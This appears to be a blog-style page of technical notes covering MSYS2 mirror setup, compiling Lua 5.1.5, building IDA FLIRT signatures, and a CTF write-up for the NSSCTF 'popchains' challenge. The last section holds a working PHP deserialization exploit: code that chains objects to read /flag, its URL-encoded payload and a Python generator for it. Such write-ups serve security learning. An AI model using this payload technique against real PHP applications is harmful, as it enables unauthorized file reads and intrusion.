MSYS2 installation

Download: MSYS2

After installing, switch to a local mirror. Under /etc/pacman.d/ in the MSYS2 root there are three mirror lists: mirrorlist.mingw32, mirrorlist.mingw64 and mirrorlist.msys. Add a Server line to each. Where the mirror offers it, prefer the https form of the URL so the package index cannot be altered on the wire; pacman still checks package signatures on top of that.

mirrorlist.mingw32, add: Server = http://mirrors.ustc.edu.cn/msys2/mingw/i686/

mirrorlist.mingw64, add: Server = http://mirrors.ustc.edu.cn/msys2/mingw/x86_64/

mirrorlist.msys, add: Server = http://mirrors.ustc.edu.cn/msys2/msys/$arch/

Once the mirrors are set, install the toolchain (this pulls in make, gcc for both MinGW targets and the usual build helpers):

```bash
pacman -S gcc make mingw-w64-i686-gcc mingw-w64-x86_64-gcc vim base-devel pkg-config
```

Then check that make is available:

```bash
make -v
```

Compiling Lua 5.1.5 on Windows

With MSYS2 ready, run the following in the Lua 5.1.5 source tree. The mingw target builds with the MinGW gcc; the install and local targets then copy the binaries, headers and library into the install prefix and into the source tree respectively:

```bash
make mingw install local
```


Creating and using SIG files

Taking lua5.1 as an example: first build it into a .lib file, then run the FLAIR tools on it, generating a .pat pattern file first and the .sig signature from that:

```bash
pcf filename.lib filename.pat
sigmake filename.pat filename.sig
```

If sigmake reports collisions it writes filename.exc instead of the .sig. Delete the leading comment lines (those beginning with ;) from that file, optionally put a + in front of the modules you want to keep, and run the sigmake command again.


Then copy the finished .sig file into IDA's sig directory (the pc subdirectory holds the x86 signatures).

In IDA, press Shift+F5 or open View - Open subviews - Signatures.


Then choose Apply new signature, pick the .sig file just added, and it is applied successfully.
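The pcf/sigmake steps above can be scripted, including the collision case that the manual workflow handles by editing the .exc file. The script below is an added example and not part of the original notes: it assumes pcf and sigmake are on PATH, the names of the functions to keep are supplied by the caller, and the .exc sample embedded at the bottom is constructed to match sigmake's layout rather than captured from a real run.

```python
"""Build an IDA FLIRT signature from a COFF library and cope with sigmake collisions.

Added example, not part of the original notes. pcf and sigmake (FLAIR tools)
are assumed to be on PATH; nothing else is required.
"""
import subprocess
from pathlib import Path


def resolve_exc(exc_text: str, keep: frozenset = frozenset()) -> str:
    """Turn a sigmake .exc collision file into one sigmake will accept.

    sigmake refuses to read the file while its leading ';' comment block is
    present. A line prefixed with '+' selects that module for the signature;
    a line left untouched excludes it. `keep` names the functions to select.
    """
    out = []
    for line in exc_text.splitlines():
        if line.startswith(";"):
            continue  # drop the instructions header sigmake wrote
        name = line.split(None, 1)[0] if line.strip() else ""
        if name and name in keep:
            line = "+" + line  # select this module
        out.append(line)
    return "\n".join(out) + "\n"


def build_signature(lib: Path, keep: frozenset = frozenset()) -> Path:
    """pcf -> sigmake, re-running sigmake once after resolving collisions."""
    pat = lib.with_suffix(".pat")
    sig = lib.with_suffix(".sig")
    exc = lib.with_suffix(".exc")  # written by sigmake when patterns collide
    subprocess.run(["pcf", str(lib), str(pat)], check=True)
    first = subprocess.run(["sigmake", str(pat), str(sig)])
    if first.returncode != 0 and exc.exists():
        exc.write_text(resolve_exc(exc.read_text(), keep))
        subprocess.run(["sigmake", str(pat), str(sig)], check=True)
    return sig


# Constructed sample of a sigmake .exc file (the hex columns are made up).
EXC_SAMPLE = """\
;--------- (delete these lines to allow sigmake to read this file)
; add '+' at the start of a line to select a module
; add '-' if you are not sure about the selection
; do nothing if you want to exclude all modules

lua_rawgeti                                         00 0000 5589E583EC18
lua_rawget                                          00 0000 5589E583EC18

luaL_checklstring                                   00 0000 5589E55756
luaL_optlstring                                     00 0000 5589E55756
"""


if __name__ == "__main__":
    # Show the resolved file; build_signature(Path("liblua.lib"), ...) would
    # run the real tools.
    print(resolve_exc(EXC_SAMPLE, frozenset({"lua_rawgeti", "luaL_checklstring"})))
```

Leaving a colliding group unmarked drops every function in it from the signature, which is the safe default: a wrong pick would label an unrelated function in the target with a Lua name and mislead the analysis that follows.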


Lifting IDA's restriction on 易语言 (EPL) function names

Edit ida.cfg and uncomment the Block_CJK_Unified_Ideographs entry in the NameChars setting, then restart IDA.

Chinese function names are then displayed correctly.


POP chain construction

Challenge: [NISACTF 2022]popchains | NSSCTF

```php
<?php
// Stub classes: only the property declarations matter for serialize(),
// so the methods of the challenge's real classes are omitted here.
class Road_is_Long
{
    public $page;
    public $string;
}
class Try_Work_Hard
{
    protected $var = "/flag";   // protected: serialized as "\0*\0var"
}
class Make_a_Change
{
    public $effort;
}

$road1 = new Road_is_Long();
$road2 = new Road_is_Long();
$try = new Try_Work_Hard();
$make = new Make_a_Change();

// Nest the objects: road1->page -> road2->string -> make->effort -> try
$road1->page = $road2;
$road2->string = $make;
$make->effort = $try;

$ser = serialize($road1);
// urlencode so the NUL bytes in the protected property name survive the request
echo urlencode($ser);
```

Submit the resulting payload (URL-encoded; the %00 bytes around the * are how PHP marks the protected property var) and you get the flag:

```
O%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3BO%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3BN%3Bs%3A6%3A%22string%22%3BO%3A13%3A%22Make_a_Change%22%3A1%3A%7Bs%3A6%3A%22effort%22%3BO%3A13%3A%22Try_Work_Hard%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A5%3A%22%2Fflag%22%3B%7D%7D%7Ds%3A6%3A%22string%22%3BN%3B%7D
```
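The same payload can be produced without a PHP interpreter once the serialization format is understood, which is also what you need when the target's property visibility differs from your local stub. The script below is an added example, not code from the write-up or the challenge: it re-implements the subset of PHP's serialize() needed for nested objects (the PhpObject helper and its visibility triples are this example's own design), builds the chain with the class names and values from the write-up, and URL-encodes it. The challenge's class methods are not reproduced on this page, so the example only builds and encodes the payload rather than triggering the chain.

```python
"""Generate the popchains payload without running PHP.

Added example, not from the original write-up: a minimal re-implementation
of PHP's serialize() format for nested objects, enough to reproduce the
payload above and to show why urlencode() is needed.
"""
from urllib.parse import quote


class PhpObject:
    """An object to serialize: class name plus (visibility, name, value) triples."""

    def __init__(self, cls, props):
        self.cls = cls
        self.props = list(props)


def php_serialize(value):
    """Serialize None/bool/int/str/PhpObject the way PHP's serialize() does."""
    if value is None:
        return "N;"
    if isinstance(value, bool):
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        # PHP counts bytes, not characters.
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, PhpObject):
        body = []
        for vis, name, val in value.props:
            # Visibility is encoded into the property name with NUL bytes:
            # public -> name, protected -> \0*\0name, private -> \0Class\0name
            if vis == "protected":
                key = "\0*\0" + name
            elif vis == "private":
                key = "\0%s\0%s" % (value.cls, name)
            else:
                key = name
            body.append(php_serialize(key) + php_serialize(val))
        return 'O:%d:"%s":%d:{%s}' % (
            len(value.cls), value.cls, len(value.props), "".join(body))
    raise TypeError("unsupported type: %r" % type(value))


def build_chain():
    """road1->page = road2; road2->string = make; make->effort = try (as in the write-up)."""
    try_ = PhpObject("Try_Work_Hard", [("protected", "var", "/flag")])
    make = PhpObject("Make_a_Change", [("public", "effort", try_)])
    road2 = PhpObject("Road_is_Long", [("public", "page", None), ("public", "string", make)])
    road1 = PhpObject("Road_is_Long", [("public", "page", road2), ("public", "string", None)])
    return php_serialize(road1)


def build_payload():
    """URL-encode so the NUL bytes in "\\0*\\0var" survive the HTTP request."""
    return quote(build_chain(), safe="")


if __name__ == "__main__":
    print(build_chain().replace("\0", "\\0"))  # readable form of the raw payload
    print(build_payload())
```

A payload pasted as plain text loses the NUL bytes, and PHP then fails to unserialize it, so the encoding step is part of the exploit, not cosmetics. quote(..., safe="") matches PHP's urlencode() for this payload because the only characters they treat differently (space and ~) do not occur in it.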